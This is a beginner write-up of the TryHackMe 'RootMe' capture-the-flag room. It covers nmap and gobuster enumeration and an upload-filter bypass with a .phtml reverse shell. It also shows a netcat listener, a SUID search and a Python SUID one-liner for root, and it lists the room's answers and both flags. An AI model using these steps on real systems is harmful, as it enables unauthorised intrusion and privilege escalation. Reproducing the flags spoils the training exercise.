We covered the basic steps of a penetration testing procedure using a beginner friendly CTF challenge froom TryHackMe named RootMe. it provides a clear, step-by-step demonstration of solving the challenge, focusing on essential penetration testing concepts. It emphasizes the use of common tools, systematic enumeration, and a logical approach to privilege escalation. The CTF is ideal for beginners to strengthen their foundational skills.
Web Hacking & Pentesting Study Notes
Objective
The challenge focuses on mastering foundational penetration testing skills, including:
Privilege Escalation: Escalating user privileges to root.
Reconnaissance: Identifying services and vulnerabilities.
Exploitation: Gaining initial access via vulnerabilities.
Workflow Overview
- Reconnaissance:
- Perform an
nmapscan to identify open ports and running services. - Focus on ports 80 (HTTP) and 22 (SSH).
- Perform an
- Directory Brute-Forcing:
- Use tools like
ffuforGoBusterto identify hidden directories. - Discovered directories include
/uploadsand/panel.
- Use tools like
- Exploitation:
- Exploit the upload functionality in
/panelto upload a reverse shell. - Circumvent basic file extension filters using
.phtmlor similar.
- Exploit the upload functionality in
- Privilege Escalation:
- Identify binaries with the SUID bit set.
- Exploit the SUID-enabled Python binary to escalate to root.
Information Gathering & Enumeration
Commands used in this stage:
nmap -sC -sV -oN nmap/rootme <MACHINE_IP>
gobuster dir -u http://<MACHINE_IP> -w <PATH_TO_WORDLIST>
Ports open on the machine:
22/ssh — OpenSSH 7.6p1
80/http — Apache httpd 2.4.29
/panel/ was discovered in the web directory and allows for file upload. Upload this reverse shell, setup your listener and get the first shell session.
Bypassing Upload Filters By Changing Extension
If the previous upload failed, rename the reverse shell and change its extension from php into .phtml and try again.
Exploitation
- Upload Reverse Shell:
- Prepare a PHP reverse shell script.
- Modify the script to include the attacker’s IP and desired port.
- Rename the file with a
.phtmlextension to bypass filtering. - Upload the file via
/panel. - Trigger the shell by accessing the uploaded file in
/uploads.
- Gaining Shell Access:
- Set up a Netcat listener:
nc -lvnp <port>. - Trigger the uploaded file to establish a reverse shell.
- Stabilize the shell for better usability using commands like
- Set up a Netcat listener:
python -c 'import pty; pty.spawn("/bin/bash")'
Privilege Escalation
- Find SUID Binaries:
- Use the
findcommand to locate binaries with the SUID bit set:
- Use the
find / -perm -4000 2>/dev/null
- Notable discovery: Python binary with SUID permissions.
Exploit Python SUID:
- Use a method from GTFOBins to execute Python as root:
python -c 'import os; os.system("/bin/sh")'
Verify root access with the id command.Navigate to /root and read the flag.
Post-Exploitation
- Answer Challenge Questions:
- Record findings such as:
- Number of open ports:
2. - Apache version:
2.4.29. - Service on port 22:
SSH.
- Number of open ports:
- Use the flag found in
/rootto complete the challenge.
- Record findings such as:
Room Answers | RootMe TryHackMe
Scan the machine, how many ports are open?
2
What version of Apache is running?
2.4.29
What service is running on port 22?
ssh
What is the hidden directory?
/panel/
Find a form to upload and get a reverse shell, and find the flag.
user.txt
THM{y0u_g0t_a_sh3ll}
Search for files with SUID permission, which file is weird?
/usr/bin/python
Find a form to escalate your privileges.
root.txt
THM{pr1v1l3g3_3sc4l4t10n}
Check out the video below for detailed explanation.
RootMe TryHackMe Video Walkthrough
